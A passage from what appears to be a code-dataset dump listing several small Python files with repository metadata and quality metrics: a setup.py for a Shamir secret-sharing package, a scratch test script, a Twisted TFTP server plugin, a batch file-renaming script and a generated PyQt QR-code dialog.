| 34.25 | 70 | 0.705474 | 440 | 2,740 | 4.061364 | 0.225 | 0.148853 | 0.172356 | 0.235031 | 0.552322 | 0.45775 | 0.45775 | 0.232233 | 0 | 0 | 0 | 0.016038 | 0.089781 | 2,740 | 79 | 71 | 34.683544 | 0.700481 | 0.026277 | 0 | 0.047619 | 0 | 0 | 0.297784 | 0.058956 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.047619 | 0 | 0.047619 | 0.095238 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8fe85a2a5d2edcb245d3a863873043a418150fca | 349 | py | Python | setup.py | Huge/shamir | 10d6d74d985603c049e31d32d1ce528936989503 | [
"CC0-1.0"
] | 19 | 2018-10-27T02:45:22.000Z | 2021-07-16T06:40:03.000Z | setup.py | Huge/shamir | 10d6d74d985603c049e31d32d1ce528936989503 | [
"CC0-1.0"
] | 1 | 2020-05-15T08:46:48.000Z | 2020-05-15T08:46:48.000Z | setup.py | Huge/shamir | 10d6d74d985603c049e31d32d1ce528936989503 | [
"CC0-1.0"
] | 7 | 2018-08-11T16:37:09.000Z | 2021-08-23T14:13:35.000Z | from setuptools import setup, find_packages
setup(
name='shamir',
version='17.12.0',
url='https://github.com/kurtbrose/shamir',
author='Kurt Rose',
author_email='kurt@kurtrose.com',
decription="fast, secure, pure python shamir's secret sharing",
long_description = open('README.rst').read(),
py_modules=['shamir'],
) | 29.083333 | 67 | 0.679083 | 45 | 349 | 5.177778 | 0.844444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017065 | 0.160458 | 349 | 12 | 68 | 29.083333 | 0.778157 | 0 | 0 | 0 | 0 | 0 | 0.397143 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8ff3c00aaa0d4bbcbd5ccc63aaa8ef235fba188d | 528 | py | Python | test/a.py | liaohongdong/IPProxy | 90152f02708717c661b7c1532e4a131a55103950 | [
"MIT"
] | null | null | null | test/a.py | liaohongdong/IPProxy | 90152f02708717c661b7c1532e4a131a55103950 | [
"MIT"
] | 1 | 2021-03-31T19:17:41.000Z | 2021-03-31T19:17:41.000Z | test/a.py | liaohongdong/IPProxy | 90152f02708717c661b7c1532e4a131a55103950 | [
"MIT"
] | null | null | null | import time
import json
import random
if __name__ == '__main__':
# a = 10
# while '39.108.111.222:1080':
# a -= 1
# print(a)
# if a <= 0:
# break
# a = ['a', 'b', 'c', 'd']
# a = []
# while a:
# print(time.gmtime().tm_sec)
# time.sleep(3)
# a = {'d': 'd', 'c': 'c'}
# print(json.dumps(a))
# q = '{"d": "d", "c": "c"}'
# aa = json.loads(q)
# print(aa['c'])
a = -1
if -1 and a < 1:
print('1')
else:
print('2') | 20.307692 | 37 | 0.386364 | 74 | 528 | 2.635135 | 0.459459 | 0.030769 | 0.071795 | 0.041026 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076687 | 0.382576 | 528 | 26 | 38 | 20.307692 | 0.521472 | 0.541667 | 0 | 0 | 0 | 0 | 0.044248 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0.222222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
8ff7d3fd7850ce85b7cdc21936b6c84557edd802 | 1,539 | py | Python | twisted/plugins/tftp_plugin.py | aivins/python-tx-tftp | 46abaa3e9e054d2bdce5d8e5c76a87b1f36b218c | [
"MIT"
] | 1 | 2021-02-06T11:26:32.000Z | 2021-02-06T11:26:32.000Z | twisted/plugins/tftp_plugin.py | techman83/python-tx-tftp | 46abaa3e9e054d2bdce5d8e5c76a87b1f36b218c | [
"MIT"
] | null | null | null | twisted/plugins/tftp_plugin.py | techman83/python-tx-tftp | 46abaa3e9e054d2bdce5d8e5c76a87b1f36b218c | [
"MIT"
] | 1 | 2016-12-20T02:42:27.000Z | 2016-12-20T02:42:27.000Z | '''
@author: shylent
'''
from tftp.backend import FilesystemSynchronousBackend
from tftp.protocol import TFTP
from twisted.application import internet
from twisted.application.service import IServiceMaker
from twisted.plugin import IPlugin
from twisted.python import usage
from twisted.python.filepath import FilePath
from zope.interface import implementer
def to_path(str_path):
return FilePath(str_path)
class TFTPOptions(usage.Options):
optFlags = [
['enable-reading', 'r', 'Lets the clients read from this server.'],
['enable-writing', 'w', 'Lets the clients write to this server.'],
['verbose', 'v', 'Make this server noisy.']
]
optParameters = [
['port', 'p', 1069, 'Port number to listen on.', int],
['root-directory', 'd', None, 'Root directory for this server.', to_path]
]
def postOptions(self):
if self['root-directory'] is None:
raise usage.UsageError("You must provide a root directory for the server")
@implementer(IServiceMaker, IPlugin)
class TFTPServiceCreator(object):
tapname = "tftp"
description = "A TFTP Server"
options = TFTPOptions
def makeService(self, options):
backend = FilesystemSynchronousBackend(options["root-directory"],
can_read=options['enable-reading'],
can_write=options['enable-writing'])
return internet.UDPServer(options['port'], TFTP(backend))
serviceMaker = TFTPServiceCreator()
| 33.456522 | 86 | 0.662118 | 168 | 1,539 | 6.029762 | 0.458333 | 0.054294 | 0.043435 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003378 | 0.230669 | 1,539 | 45 | 87 | 34.2 | 0.852196 | 0.010396 | 0 | 0 | 0 | 0 | 0.223762 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.088235 | false | 0 | 0.235294 | 0.029412 | 0.588235 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
8904373aaecfdf0e3fe1f208451b5f80bdc6f598 | 515 | py | Python | ar_app/scripts/renamefiles.py | osetr/ar-opencv-python | ae62ebeed176ef2e6d8d68fbaaa7d402dadc3eb3 | [
"MIT"
] | 1 | 2020-11-22T13:55:11.000Z | 2020-11-22T13:55:11.000Z | ar_app/scripts/renamefiles.py | osetr/ar-opencv-python | ae62ebeed176ef2e6d8d68fbaaa7d402dadc3eb3 | [
"MIT"
] | null | null | null | ar_app/scripts/renamefiles.py | osetr/ar-opencv-python | ae62ebeed176ef2e6d8d68fbaaa7d402dadc3eb3 | [
"MIT"
] | null | null | null | import os
from natsort import natsorted
path_to_directory = input("Enter path to directory: ") + "/"
new_name = input("Enter new name for files: ")
try:
i = 0
list_of_files = natsorted(os.listdir(path_to_directory))
for file in list_of_files:
i += 1
extension = file.split(".")[1]
os.rename(
path_to_directory + file,
path_to_directory + new_name + str(i) + "." + extension,
)
except FileNotFoundError:
print("Got unccorect directory path")
| 27.105263 | 68 | 0.631068 | 67 | 515 | 4.641791 | 0.477612 | 0.096463 | 0.241158 | 0.115756 | 0.141479 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007874 | 0.260194 | 515 | 18 | 69 | 28.611111 | 0.808399 | 0 | 0 | 0 | 0 | 0 | 0.159223 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0.0625 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8906e41b0e2eb2a80f686b6c8428c70bf8ab1bf1 | 1,387 | py | Python | keyman44/interface/rcv_page.py | sahabi/keyman44 | 73d62eac3b96ec6951b1d88edf5e0f7c787f7440 | [
"MIT"
] | null | null | null | keyman44/interface/rcv_page.py | sahabi/keyman44 | 73d62eac3b96ec6951b1d88edf5e0f7c787f7440 | [
"MIT"
] | null | null | null | keyman44/interface/rcv_page.py | sahabi/keyman44 | 73d62eac3b96ec6951b1d88edf5e0f7c787f7440 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui/rcv_page.ui'
#
# Created by: PyQt5 UI code generator 5.9
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(400, 300)
self.pushButton = QtWidgets.QPushButton(Dialog)
self.pushButton.setGeometry(QtCore.QRect(290, 260, 98, 27))
self.pushButton.setObjectName("pushButton")
self.qr_label = QtWidgets.QLabel(Dialog)
self.qr_label.setGeometry(QtCore.QRect(55, 70, 311, 161))
self.qr_label.setAlignment(QtCore.Qt.AlignCenter)
self.qr_label.setObjectName("qr_label")
self.address_label = QtWidgets.QLabel(Dialog)
self.address_label.setGeometry(QtCore.QRect(20, 10, 371, 17))
self.address_label.setObjectName("address_label")
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
self.pushButton.setText(_translate("Dialog", "Close"))
self.qr_label.setText(_translate("Dialog", "QR CODE"))
self.address_label.setText(_translate("Dialog", "Address"))
| 38.527778 | 69 | 0.695025 | 163 | 1,387 | 5.803681 | 0.447853 | 0.044397 | 0.05814 | 0.054968 | 0.063425 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035398 | 0.185292 | 1,387 | 35 | 70 | 39.628571 | 0.80177 | 0.131218 | 0 | 0 | 1 | 0 | 0.071846 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0 | 0.043478 | 0 | 0.173913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.